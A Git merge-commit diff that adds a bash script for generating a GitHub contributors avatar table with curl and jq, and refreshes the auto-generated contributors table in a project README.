Merge branch 'danielmiessler:master' into master
This commit is contained in:
86
.bin/generate-contributors
Executable file
86
.bin/generate-contributors
Executable file
@@ -0,0 +1,86 @@
|
|||||||
|
#!/usr/bin/env bash
|
||||||
|
#
|
||||||
|
## Requires jq
|
||||||
|
#
|
||||||
|
## Example: bash github-api-contributors-gen.sh "danielmiessler/SecLists"
|
||||||
|
#
|
||||||
|
|
||||||
|
## https://github.com/<value>
|
||||||
|
githubRepo=${1:-danielmiessler/SecLists}
|
||||||
|
|
||||||
|
## How many avatar's per row
|
||||||
|
avatar_row=5
|
||||||
|
|
||||||
|
## Start at the start
|
||||||
|
page=1
|
||||||
|
|
||||||
|
## Empty the values
|
||||||
|
login=()
|
||||||
|
avatar_url=()
|
||||||
|
url=()
|
||||||
|
|
||||||
|
## Do until there isn't anything returned
|
||||||
|
while true; do
|
||||||
|
## Call the API, to extract the JSON for that page
|
||||||
|
json=$( curl -s "https://api.github.com/repos/${githubRepo}/contributors?page=${page}" )
|
||||||
|
|
||||||
|
## Check to see if its empty or not - if it is, exit the loop
|
||||||
|
[[ -z "$( echo ${json} | jq -r '.[]' )" ]] \
|
||||||
|
&& break
|
||||||
|
|
||||||
|
## Loop over all three values, save to an array (dirty - as multiple loops hardcoded...)
|
||||||
|
for x in $( echo ${json} | jq -r ".[].login" ); do
|
||||||
|
login+=($x)
|
||||||
|
done
|
||||||
|
|
||||||
|
for x in $( echo ${json} | jq -r ".[].avatar_url" ); do
|
||||||
|
avatar_url+=($x)
|
||||||
|
done
|
||||||
|
|
||||||
|
for x in $( echo ${json} | jq -r ".[].url" ); do
|
||||||
|
url+=($x)
|
||||||
|
done
|
||||||
|
|
||||||
|
## Check to make sure all arrays are the same length (dirty - but works...)
|
||||||
|
if [ "${#login[@]}" -ne "${#avatar_url[@]}" ]; then
|
||||||
|
echo "[-] Issues with login & avatar_url"
|
||||||
|
exit 1
|
||||||
|
elif [ "${#login[@]}" -ne "${#url[@]}" ]; then
|
||||||
|
echo "[-] Issues with login & url"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
## Increase the page count
|
||||||
|
(( page ++))
|
||||||
|
done
|
||||||
|
|
||||||
|
|
||||||
|
## Make markdown headers
|
||||||
|
for x in " " "---"; do
|
||||||
|
echo -n "|"
|
||||||
|
for y in $( seq 1 "${avatar_row}" ); do
|
||||||
|
echo -n "${x}|"
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
done
|
||||||
|
|
||||||
|
|
||||||
|
## Counter for avatar_row
|
||||||
|
i=1
|
||||||
|
## For every value in the arrays above, do the following
|
||||||
|
for x in $( seq 0 "${#login[@]}" ); do
|
||||||
|
## As array starts at 0, length starts at 1, there will be one extra - skip the end!
|
||||||
|
[ ${x} -eq ${#login[@]} ] \
|
||||||
|
&& break
|
||||||
|
|
||||||
|
echo -n "<img width='50' src='${avatar_url[${x}]}'/><br />[${login[${x}]}](${url[${x}]}) | "
|
||||||
|
|
||||||
|
## Every x rows, do put onto a new line
|
||||||
|
[ $i -ge ${avatar_row} ] \
|
||||||
|
&& i=0 \
|
||||||
|
&& echo
|
||||||
|
|
||||||
|
## Increase the row count
|
||||||
|
(( i ++))
|
||||||
|
done
|
||||||
|
echo
|
||||||
@@ -39,42 +39,46 @@ This project stays great because of care and love from the [community](https://g
|
|||||||
|
|
||||||
- - -
|
- - -
|
||||||
|
|
||||||
<!-- TABLE-AUTO-GENERATED ~ https://gist.github.com/g0tmi1k/ -->
|
<!-- TABLE-AUTO-GENERATED -->
|
||||||
| | | | | |
|
| | | | | |
|
||||||
|---|---|---|---|---|
|
|---|---|---|---|---|
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/535942?v=4'/><br />[g0tmi1k](https://api.github.com/users/g0tmi1k) | <img width='50' src='https://avatars.githubusercontent.com/u/50654?v=4'/><br />[danielmiessler](https://api.github.com/users/danielmiessler) | <img width='50' src='https://avatars.githubusercontent.com/u/3488554?v=4'/><br />[jhaddix](https://api.github.com/users/jhaddix) | <img width='50' src='https://avatars.githubusercontent.com/u/1573775?v=4'/><br />[righettod](https://api.github.com/users/righettod) | <img width='50' src='https://avatars.githubusercontent.com/u/20900400?v=4'/><br />[toxydose](https://api.github.com/users/toxydose) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/535942?v=4'/><br />[g0tmi1k](https://api.github.com/users/g0tmi1k) | <img width='50' src='https://avatars.githubusercontent.com/u/50654?v=4'/><br />[danielmiessler](https://api.github.com/users/danielmiessler) | <img width='50' src='https://avatars.githubusercontent.com/u/3488554?v=4'/><br />[jhaddix](https://api.github.com/users/jhaddix) | <img width='50' src='https://avatars.githubusercontent.com/u/1573775?v=4'/><br />[righettod](https://api.github.com/users/righettod) | <img width='50' src='https://avatars.githubusercontent.com/u/20900400?v=4'/><br />[toxydose](https://api.github.com/users/toxydose) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/2042196?v=4'/><br />[cbk914](https://api.github.com/users/cbk914) | <img width='50' src='https://avatars.githubusercontent.com/u/3483615?v=4'/><br />[shipcod3](https://api.github.com/users/shipcod3) | <img width='50' src='https://avatars.githubusercontent.com/u/6421894?v=4'/><br />[govolution](https://api.github.com/users/govolution) | <img width='50' src='https://avatars.githubusercontent.com/u/6471785?v=4'/><br />[mcjon3z](https://api.github.com/users/mcjon3z) | <img width='50' src='https://avatars.githubusercontent.com/u/208085?v=4'/><br />[semprix](https://api.github.com/users/semprix) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/2042196?v=4'/><br />[cbk914](https://api.github.com/users/cbk914) | <img width='50' src='https://avatars.githubusercontent.com/u/3483615?v=4'/><br />[shipcod3](https://api.github.com/users/shipcod3) | <img width='50' src='https://avatars.githubusercontent.com/u/6421894?v=4'/><br />[govolution](https://api.github.com/users/govolution) | <img width='50' src='https://avatars.githubusercontent.com/u/6471785?v=4'/><br />[mcjon3z](https://api.github.com/users/mcjon3z) | <img width='50' src='https://avatars.githubusercontent.com/u/8036727?v=4'/><br />[drwetter](https://api.github.com/users/drwetter) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/8182650?v=4'/><br />[erose1337](https://api.github.com/users/erose1337) | <img width='50' src='https://avatars.githubusercontent.com/u/8036727?v=4'/><br />[drwetter](https://api.github.com/users/drwetter) | <img width='50' src='https://avatars.githubusercontent.com/u/1276654?v=4'/><br />[leesoh](https://api.github.com/users/leesoh) | <img width='50' src='https://avatars.githubusercontent.com/u/2713634?v=4'/><br />[Rbcafe](https://api.github.com/users/Rbcafe) | <img width='50' src='https://avatars.githubusercontent.com/u/59408894?v=4'/><br />[shelld3v](https://api.github.com/users/shelld3v) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/208085?v=4'/><br />[semprix](https://api.github.com/users/semprix) | <img width='50' src='https://avatars.githubusercontent.com/u/8182650?v=4'/><br />[erose1337](https://api.github.com/users/erose1337) | <img width='50' src='https://avatars.githubusercontent.com/u/1276654?v=4'/><br />[leesoh](https://api.github.com/users/leesoh) | <img width='50' src='https://avatars.githubusercontent.com/u/2713634?v=4'/><br />[Rbcafe](https://api.github.com/users/Rbcafe) | <img width='50' src='https://avatars.githubusercontent.com/u/59408894?v=4'/><br />[shelld3v](https://api.github.com/users/shelld3v) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/5740946?v=4'/><br />[alexlauerman](https://api.github.com/users/alexlauerman) | <img width='50' src='https://avatars.githubusercontent.com/u/527411?v=4'/><br />[kazkansouh](https://api.github.com/users/kazkansouh) | <img width='50' src='https://avatars.githubusercontent.com/u/28283303?v=4'/><br />[chacka0101](https://api.github.com/users/chacka0101) | <img width='50' src='https://avatars.githubusercontent.com/u/18607514?v=4'/><br />[TAbdiukov](https://api.github.com/users/TAbdiukov) | <img width='50' src='https://avatars.githubusercontent.com/u/23329185?v=4'/><br />[krvaibhaw](https://api.github.com/users/krvaibhaw) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/46269721?v=4'/><br />[PinkDev1](https://api.github.com/users/PinkDev1) | <img width='50' src='https://avatars.githubusercontent.com/u/5740946?v=4'/><br />[alexlauerman](https://api.github.com/users/alexlauerman) | <img width='50' src='https://avatars.githubusercontent.com/u/527411?v=4'/><br />[kazkansouh](https://api.github.com/users/kazkansouh) | <img width='50' src='https://avatars.githubusercontent.com/u/18504086?v=4'/><br />[clem9669](https://api.github.com/users/clem9669) | <img width='50' src='https://avatars.githubusercontent.com/u/16578570?v=4'/><br />[noraj](https://api.github.com/users/noraj) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/18504086?v=4'/><br />[clem9669](https://api.github.com/users/clem9669) | <img width='50' src='https://avatars.githubusercontent.com/u/16578570?v=4'/><br />[noraj](https://api.github.com/users/noraj) | <img width='50' src='https://avatars.githubusercontent.com/u/1785416?v=4'/><br />[ericrange](https://api.github.com/users/ericrange) | <img width='50' src='https://avatars.githubusercontent.com/u/577380?v=4'/><br />[tkisason](https://api.github.com/users/tkisason) | <img width='50' src='https://avatars.githubusercontent.com/u/42532003?v=4'/><br />[realArcherL](https://api.github.com/users/realArcherL) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/28283303?v=4'/><br />[chacka0101](https://api.github.com/users/chacka0101) | <img width='50' src='https://avatars.githubusercontent.com/u/18607514?v=4'/><br />[TAbdiukov](https://api.github.com/users/TAbdiukov) | <img width='50' src='https://avatars.githubusercontent.com/u/23329185?v=4'/><br />[krvaibhaw](https://api.github.com/users/krvaibhaw) | <img width='50' src='https://avatars.githubusercontent.com/u/1785416?v=4'/><br />[ericrange](https://api.github.com/users/ericrange) | <img width='50' src='https://avatars.githubusercontent.com/u/17729335?v=4'/><br />[soufianetahiri](https://api.github.com/users/soufianetahiri) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/2213846?v=4'/><br />[tomcodes](https://api.github.com/users/tomcodes) | <img width='50' src='https://avatars.githubusercontent.com/u/33422344?v=4'/><br />[s7x](https://api.github.com/users/s7x) | <img width='50' src='https://avatars.githubusercontent.com/u/4060683?v=4'/><br />[PaulSec](https://api.github.com/users/PaulSec) | <img width='50' src='https://avatars.githubusercontent.com/u/26912085?v=4'/><br />[ArgentEnergy](https://api.github.com/users/ArgentEnergy) | <img width='50' src='https://avatars.githubusercontent.com/u/51872031?v=4'/><br />[dabasanta](https://api.github.com/users/dabasanta) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/577380?v=4'/><br />[tkisason](https://api.github.com/users/tkisason) | <img width='50' src='https://avatars.githubusercontent.com/u/42532003?v=4'/><br />[realArcherL](https://api.github.com/users/realArcherL) | <img width='50' src='https://avatars.githubusercontent.com/u/2213846?v=4'/><br />[tomcodes](https://api.github.com/users/tomcodes) | <img width='50' src='https://avatars.githubusercontent.com/u/33422344?v=4'/><br />[s7x](https://api.github.com/users/s7x) | <img width='50' src='https://avatars.githubusercontent.com/u/4060683?v=4'/><br />[PaulSec](https://api.github.com/users/PaulSec) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/8066322?v=4'/><br />[whoot](https://api.github.com/users/whoot) | <img width='50' src='https://avatars.githubusercontent.com/u/4868297?v=4'/><br />[ricardojba](https://api.github.com/users/ricardojba) | <img width='50' src='https://avatars.githubusercontent.com/u/26716802?v=4'/><br />[s0md3v](https://api.github.com/users/s0md3v) | <img width='50' src='https://avatars.githubusercontent.com/u/17729335?v=4'/><br />[soufianetahiri](https://api.github.com/users/soufianetahiri) | <img width='50' src='https://avatars.githubusercontent.com/u/20663675?v=4'/><br />[XalfiE](https://api.github.com/users/XalfiE) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/26912085?v=4'/><br />[ArgentEnergy](https://api.github.com/users/ArgentEnergy) | <img width='50' src='https://avatars.githubusercontent.com/u/51872031?v=4'/><br />[dabasanta](https://api.github.com/users/dabasanta) | <img width='50' src='https://avatars.githubusercontent.com/u/8066322?v=4'/><br />[whoot](https://api.github.com/users/whoot) | <img width='50' src='https://avatars.githubusercontent.com/u/4868297?v=4'/><br />[ricardojba](https://api.github.com/users/ricardojba) | <img width='50' src='https://avatars.githubusercontent.com/u/26716802?v=4'/><br />[s0md3v](https://api.github.com/users/s0md3v) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/323113?v=4'/><br />[ethicalhack3r](https://api.github.com/users/ethicalhack3r) | <img width='50' src='https://avatars.githubusercontent.com/u/7244777?v=4'/><br />[n3k00n3](https://api.github.com/users/n3k00n3) | <img width='50' src='https://avatars.githubusercontent.com/u/29328096?v=4'/><br />[redstonedesigner](https://api.github.com/users/redstonedesigner) | <img width='50' src='https://avatars.githubusercontent.com/u/15280042?v=4'/><br />[its0x08](https://api.github.com/users/its0x08) | <img width='50' src='https://avatars.githubusercontent.com/u/4091936?v=4'/><br />[kurobeats](https://api.github.com/users/kurobeats) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/20663675?v=4'/><br />[XalfiE](https://api.github.com/users/XalfiE) | <img width='50' src='https://avatars.githubusercontent.com/u/323113?v=4'/><br />[ethicalhack3r](https://api.github.com/users/ethicalhack3r) | <img width='50' src='https://avatars.githubusercontent.com/u/7244777?v=4'/><br />[n3k00n3](https://api.github.com/users/n3k00n3) | <img width='50' src='https://avatars.githubusercontent.com/u/29328096?v=4'/><br />[redstonedesigner](https://api.github.com/users/redstonedesigner) | <img width='50' src='https://avatars.githubusercontent.com/u/15280042?v=4'/><br />[its0x08](https://api.github.com/users/its0x08) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/3942720?v=4'/><br />[Beverdam](https://api.github.com/users/Beverdam) | <img width='50' src='https://avatars.githubusercontent.com/u/1137488?v=4'/><br />[camas](https://api.github.com/users/camas) | <img width='50' src='https://avatars.githubusercontent.com/u/2283072?v=4'/><br />[cmaruti](https://api.github.com/users/cmaruti) | <img width='50' src='https://avatars.githubusercontent.com/u/7252342?v=4'/><br />[dee-see](https://api.github.com/users/dee-see) | <img width='50' src='https://avatars.githubusercontent.com/u/571077?v=4'/><br />[jebentier](https://api.github.com/users/jebentier) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/45089292?v=4'/><br />[afaq1337](https://api.github.com/users/afaq1337) | <img width='50' src='https://avatars.githubusercontent.com/u/4091936?v=4'/><br />[kurobeats](https://api.github.com/users/kurobeats) | <img width='50' src='https://avatars.githubusercontent.com/u/3942720?v=4'/><br />[Beverdam](https://api.github.com/users/Beverdam) | <img width='50' src='https://avatars.githubusercontent.com/u/1137488?v=4'/><br />[camas](https://api.github.com/users/camas) | <img width='50' src='https://avatars.githubusercontent.com/u/2283072?v=4'/><br />[cmaruti](https://api.github.com/users/cmaruti) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/1502856?v=4'/><br />[albinowax](https://api.github.com/users/albinowax) | <img width='50' src='https://avatars.githubusercontent.com/u/18244131?v=4'/><br />[storenth](https://api.github.com/users/storenth) | <img width='50' src='https://avatars.githubusercontent.com/u/10476537?v=4'/><br />[Lavaei](https://api.github.com/users/Lavaei) | <img width='50' src='https://avatars.githubusercontent.com/u/44903767?v=4'/><br />[PinkDraconian](https://api.github.com/users/PinkDraconian) | <img width='50' src='https://avatars.githubusercontent.com/u/29152363?v=4'/><br />[q-analysis](https://api.github.com/users/q-analysis) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/7252342?v=4'/><br />[dee-see](https://api.github.com/users/dee-see) | <img width='50' src='https://avatars.githubusercontent.com/u/571077?v=4'/><br />[jebentier](https://api.github.com/users/jebentier) | <img width='50' src='https://avatars.githubusercontent.com/u/1502856?v=4'/><br />[albinowax](https://api.github.com/users/albinowax) | <img width='50' src='https://avatars.githubusercontent.com/u/18244131?v=4'/><br />[storenth](https://api.github.com/users/storenth) | <img width='50' src='https://avatars.githubusercontent.com/u/10476537?v=4'/><br />[Lavaei](https://api.github.com/users/Lavaei) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/7304307?v=4'/><br />[henshin](https://api.github.com/users/henshin) | <img width='50' src='https://avatars.githubusercontent.com/u/5198839?v=4'/><br />[charliecampbell-zz](https://api.github.com/users/charliecampbell-zz) | <img width='50' src='https://avatars.githubusercontent.com/u/1561073?v=4'/><br />[j0hnf](https://api.github.com/users/j0hnf) | <img width='50' src='https://avatars.githubusercontent.com/u/5717375?v=4'/><br />[pbafe](https://api.github.com/users/pbafe) | <img width='50' src='https://avatars.githubusercontent.com/u/15986741?v=4'/><br />[xrobhal](https://api.github.com/users/xrobhal) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/44903767?v=4'/><br />[PinkDraconian](https://api.github.com/users/PinkDraconian) | <img width='50' src='https://avatars.githubusercontent.com/u/29152363?v=4'/><br />[q-analysis](https://api.github.com/users/q-analysis) | <img width='50' src='https://avatars.githubusercontent.com/u/7304307?v=4'/><br />[henshin](https://api.github.com/users/henshin) | <img width='50' src='https://avatars.githubusercontent.com/u/5198839?v=4'/><br />[charliecampbell-zz](https://api.github.com/users/charliecampbell-zz) | <img width='50' src='https://avatars.githubusercontent.com/u/1561073?v=4'/><br />[j0hnf](https://api.github.com/users/j0hnf) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/16657045?v=4'/><br />[hisxo](https://api.github.com/users/hisxo) | <img width='50' src='https://avatars.githubusercontent.com/u/3531020?v=4'/><br />[bkimminich](https://api.github.com/users/bkimminich) | <img width='50' src='https://avatars.githubusercontent.com/u/32751905?v=4'/><br />[haxxinen](https://api.github.com/users/haxxinen) | <img width='50' src='https://avatars.githubusercontent.com/u/13208587?v=4'/><br />[nsonaniya2010](https://api.github.com/users/nsonaniya2010) | <img width='50' src='https://avatars.githubusercontent.com/u/30723680?v=4'/><br />[0verflowme](https://api.github.com/users/0verflowme) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/17338428?v=4'/><br />[mxrch](https://api.github.com/users/mxrch) | <img width='50' src='https://avatars.githubusercontent.com/u/5717375?v=4'/><br />[pbafe](https://api.github.com/users/pbafe) | <img width='50' src='https://avatars.githubusercontent.com/u/15986741?v=4'/><br />[xrobhal](https://api.github.com/users/xrobhal) | <img width='50' src='https://avatars.githubusercontent.com/u/16657045?v=4'/><br />[hisxo](https://api.github.com/users/hisxo) | <img width='50' src='https://avatars.githubusercontent.com/u/3531020?v=4'/><br />[bkimminich](https://api.github.com/users/bkimminich) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/30723680?v=4'/><br />[0verflowme](https://api.github.com/users/0verflowme) | <img width='50' src='https://avatars.githubusercontent.com/u/69147968?v=4'/><br />[TheSerialiZator](https://api.github.com/users/TheSerialiZator) | <img width='50' src='https://avatars.githubusercontent.com/u/65570372?v=4'/><br />[5tr1x](https://api.github.com/users/5tr1x) | <img width='50' src='https://avatars.githubusercontent.com/u/31401273?v=4'/><br />[7PH](https://api.github.com/users/7PH) | <img width='50' src='https://avatars.githubusercontent.com/u/4494413?v=4'/><br />[acaetano](https://api.github.com/users/acaetano) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/32751905?v=4'/><br />[haxxinen](https://api.github.com/users/haxxinen) | <img width='50' src='https://avatars.githubusercontent.com/u/13208587?v=4'/><br />[nsonaniya2010](https://api.github.com/users/nsonaniya2010) | <img width='50' src='https://avatars.githubusercontent.com/u/30723680?v=4'/><br />[0verflowme](https://api.github.com/users/0verflowme) | <img width='50' src='https://avatars.githubusercontent.com/u/69147968?v=4'/><br />[TheSerialiZator](https://api.github.com/users/TheSerialiZator) | <img width='50' src='https://avatars.githubusercontent.com/u/65570372?v=4'/><br />[5tr1x](https://api.github.com/users/5tr1x) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/49078770?v=4'/><br />[jaiswalakshansh](https://api.github.com/users/jaiswalakshansh) | <img width='50' src='https://avatars.githubusercontent.com/u/24873615?v=4'/><br />[Zeecka](https://api.github.com/users/Zeecka) | <img width='50' src='https://avatars.githubusercontent.com/u/3776815?v=4'/><br />[xpirt](https://api.github.com/users/xpirt) | <img width='50' src='https://avatars.githubusercontent.com/u/3112309?v=4'/><br />[radarhere](https://api.github.com/users/radarhere) | <img width='50' src='https://avatars.githubusercontent.com/u/11784198?v=4'/><br />[Annihilat0r](https://api.github.com/users/Annihilat0r) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/31401273?v=4'/><br />[7PH](https://api.github.com/users/7PH) | <img width='50' src='https://avatars.githubusercontent.com/u/4494413?v=4'/><br />[acaetano](https://api.github.com/users/acaetano) | <img width='50' src='https://avatars.githubusercontent.com/u/49078770?v=4'/><br />[jaiswalakshansh](https://api.github.com/users/jaiswalakshansh) | <img width='50' src='https://avatars.githubusercontent.com/u/24873615?v=4'/><br />[Zeecka](https://api.github.com/users/Zeecka) | <img width='50' src='https://avatars.githubusercontent.com/u/3776815?v=4'/><br />[xpirt](https://api.github.com/users/xpirt) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/6367812?v=4'/><br />[aguilbau](https://api.github.com/users/aguilbau) | <img width='50' src='https://avatars.githubusercontent.com/u/11555225?v=4'/><br />[Glassware123](https://api.github.com/users/Glassware123) | <img width='50' src='https://avatars.githubusercontent.com/u/43996156?v=4'/><br />[arjunshibu](https://api.github.com/users/arjunshibu) | <img width='50' src='https://avatars.githubusercontent.com/u/26533735?v=4'/><br />[berzerk0](https://api.github.com/users/berzerk0) | <img width='50' src='https://avatars.githubusercontent.com/u/2964660?v=4'/><br />[caioluders](https://api.github.com/users/caioluders) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/3112309?v=4'/><br />[radarhere](https://api.github.com/users/radarhere) | <img width='50' src='https://avatars.githubusercontent.com/u/11784198?v=4'/><br />[Annihilat0r](https://api.github.com/users/Annihilat0r) | <img width='50' src='https://avatars.githubusercontent.com/u/6367812?v=4'/><br />[aguilbau](https://api.github.com/users/aguilbau) | <img width='50' src='https://avatars.githubusercontent.com/u/11555225?v=4'/><br />[Glassware123](https://api.github.com/users/Glassware123) | <img width='50' src='https://avatars.githubusercontent.com/u/43996156?v=4'/><br />[arjunshibu](https://api.github.com/users/arjunshibu) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/1770039?v=4'/><br />[Floppynator](https://api.github.com/users/Floppynator) | <img width='50' src='https://avatars.githubusercontent.com/u/550823?v=4'/><br />[cnotin](https://api.github.com/users/cnotin) | <img width='50' src='https://avatars.githubusercontent.com/u/25722501?v=4'/><br />[CoccodrillooXDS](https://api.github.com/users/CoccodrillooXDS) | <img width='50' src='https://avatars.githubusercontent.com/u/19563282?v=4'/><br />[lc](https://api.github.com/users/lc) | <img width='50' src='https://avatars.githubusercontent.com/u/17801590?v=4'/><br />[CyDoor](https://api.github.com/users/CyDoor) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/26533735?v=4'/><br />[berzerk0](https://api.github.com/users/berzerk0) | <img width='50' src='https://avatars.githubusercontent.com/u/2964660?v=4'/><br />[caioluders](https://api.github.com/users/caioluders) | <img width='50' src='https://avatars.githubusercontent.com/u/947834?v=4'/><br />[ruevaughn](https://api.github.com/users/ruevaughn) | <img width='50' src='https://avatars.githubusercontent.com/u/1770039?v=4'/><br />[Floppynator](https://api.github.com/users/Floppynator) | <img width='50' src='https://avatars.githubusercontent.com/u/550823?v=4'/><br />[cnotin](https://api.github.com/users/cnotin) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/62349500?v=4'/><br />[GovindPalakkal](https://api.github.com/users/GovindPalakkal) | <img width='50' src='https://avatars.githubusercontent.com/u/81271?v=4'/><br />[daehee](https://api.github.com/users/daehee) | <img width='50' src='https://avatars.githubusercontent.com/u/34819234?v=4'/><br />[danrneal](https://api.github.com/users/danrneal) | <img width='50' src='https://avatars.githubusercontent.com/u/6136439?v=4'/><br />[DarrenRainey](https://api.github.com/users/DarrenRainey) | <img width='50' src='https://avatars.githubusercontent.com/u/19776?v=4'/><br />[denzuko](https://api.github.com/users/denzuko) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/25722501?v=4'/><br />[CoccodrillooXDS](https://api.github.com/users/CoccodrillooXDS) | <img width='50' src='https://avatars.githubusercontent.com/u/19563282?v=4'/><br />[lc](https://api.github.com/users/lc) | <img width='50' src='https://avatars.githubusercontent.com/u/50272190?v=4'/><br />[basubanakar](https://api.github.com/users/basubanakar) | <img width='50' src='https://avatars.githubusercontent.com/u/17801590?v=4'/><br />[CyDoor](https://api.github.com/users/CyDoor) | <img width='50' src='https://avatars.githubusercontent.com/u/62349500?v=4'/><br />[GovindPalakkal](https://api.github.com/users/GovindPalakkal) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/26867637?v=4'/><br />[ernestask](https://api.github.com/users/ernestask) | <img width='50' src='https://avatars.githubusercontent.com/u/1264369?v=4'/><br />[fiLLLip](https://api.github.com/users/fiLLLip) | <img width='50' src='https://avatars.githubusercontent.com/u/11011688?v=4'/><br />[francisuk1989](https://api.github.com/users/francisuk1989) | <img width='50' src='https://avatars.githubusercontent.com/u/19889044?v=4'/><br />[giomke](https://api.github.com/users/giomke) | <img width='50' src='https://avatars.githubusercontent.com/u/60477737?v=4'/><br />[GraoMelo](https://api.github.com/users/GraoMelo) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/81271?v=4'/><br />[daehee](https://api.github.com/users/daehee) | <img width='50' src='https://avatars.githubusercontent.com/u/34819234?v=4'/><br />[danrneal](https://api.github.com/users/danrneal) | <img width='50' src='https://avatars.githubusercontent.com/u/6136439?v=4'/><br />[DarrenRainey](https://api.github.com/users/DarrenRainey) | <img width='50' src='https://avatars.githubusercontent.com/u/19776?v=4'/><br />[denzuko](https://api.github.com/users/denzuko) | <img width='50' src='https://avatars.githubusercontent.com/u/26867637?v=4'/><br />[ernestask](https://api.github.com/users/ernestask) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/10110093?v=4'/><br />[hectorgrecco](https://api.github.com/users/hectorgrecco) | <img width='50' src='https://avatars.githubusercontent.com/u/127512?v=4'/><br />[craSH](https://api.github.com/users/craSH) | <img width='50' src='https://avatars.githubusercontent.com/u/1165242?v=4'/><br />[ilyaglow](https://api.github.com/users/ilyaglow) | <img width='50' src='https://avatars.githubusercontent.com/u/3500664?v=4'/><br />[IndiNijhof](https://api.github.com/users/IndiNijhof) | <img width='50' src='https://avatars.githubusercontent.com/u/39941993?v=4'/><br />[0xInfection](https://api.github.com/users/0xInfection) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/1264369?v=4'/><br />[fiLLLip](https://api.github.com/users/fiLLLip) | <img width='50' src='https://avatars.githubusercontent.com/u/11011688?v=4'/><br />[francisuk1989](https://api.github.com/users/francisuk1989) | <img width='50' src='https://avatars.githubusercontent.com/u/19889044?v=4'/><br />[giomke](https://api.github.com/users/giomke) | <img width='50' src='https://avatars.githubusercontent.com/u/60477737?v=4'/><br />[GraoMelo](https://api.github.com/users/GraoMelo) | <img width='50' src='https://avatars.githubusercontent.com/u/10110093?v=4'/><br />[hectorgrecco](https://api.github.com/users/hectorgrecco) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/3799709?v=4'/><br />[jakecraige](https://api.github.com/users/jakecraige) | <img width='50' src='https://avatars.githubusercontent.com/u/859420?v=4'/><br />[vortexau](https://api.github.com/users/vortexau) | <img width='50' src='https://avatars.githubusercontent.com/u/281523?v=4'/><br />[JensTimmerman](https://api.github.com/users/JensTimmerman) | <img width='50' src='https://avatars.githubusercontent.com/u/43987245?v=4'/><br />[0xJs](https://api.github.com/users/0xJs) | <img width='50' src='https://avatars.githubusercontent.com/u/37518297?v=4'/><br />[qurbat](https://api.github.com/users/qurbat) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/127512?v=4'/><br />[craSH](https://api.github.com/users/craSH) | <img width='50' src='https://avatars.githubusercontent.com/u/1165242?v=4'/><br />[ilyaglow](https://api.github.com/users/ilyaglow) | <img width='50' src='https://avatars.githubusercontent.com/u/3500664?v=4'/><br />[IndiNijhof](https://api.github.com/users/IndiNijhof) | <img width='50' src='https://avatars.githubusercontent.com/u/39941993?v=4'/><br />[0xInfection](https://api.github.com/users/0xInfection) | <img width='50' src='https://avatars.githubusercontent.com/u/3799709?v=4'/><br />[jakecraige](https://api.github.com/users/jakecraige) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/65019367?v=4'/><br />[LabanSkollerDefensify](https://api.github.com/users/LabanSkollerDefensify) | <img width='50' src='https://avatars.githubusercontent.com/u/64550669?v=4'/><br />[LethargicLeprechaun](https://api.github.com/users/LethargicLeprechaun) | <img width='50' src='https://avatars.githubusercontent.com/u/1522389?v=4'/><br />[stuntguy3000](https://api.github.com/users/stuntguy3000) | <img width='50' src='https://avatars.githubusercontent.com/u/6770124?v=4'/><br />[Paradoxis](https://api.github.com/users/Paradoxis) | <img width='50' src='https://avatars.githubusercontent.com/u/13625919?v=4'/><br />[chokeee](https://api.github.com/users/chokeee) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/859420?v=4'/><br />[vortexau](https://api.github.com/users/vortexau) | <img width='50' src='https://avatars.githubusercontent.com/u/281523?v=4'/><br />[JensTimmerman](https://api.github.com/users/JensTimmerman) | <img width='50' src='https://avatars.githubusercontent.com/u/43987245?v=4'/><br />[0xJs](https://api.github.com/users/0xJs) | <img width='50' src='https://avatars.githubusercontent.com/u/37518297?v=4'/><br />[qurbat](https://api.github.com/users/qurbat) | <img width='50' src='https://avatars.githubusercontent.com/u/64550669?v=4'/><br />[LethargicLeprechaun](https://api.github.com/users/LethargicLeprechaun) |
|
||||||
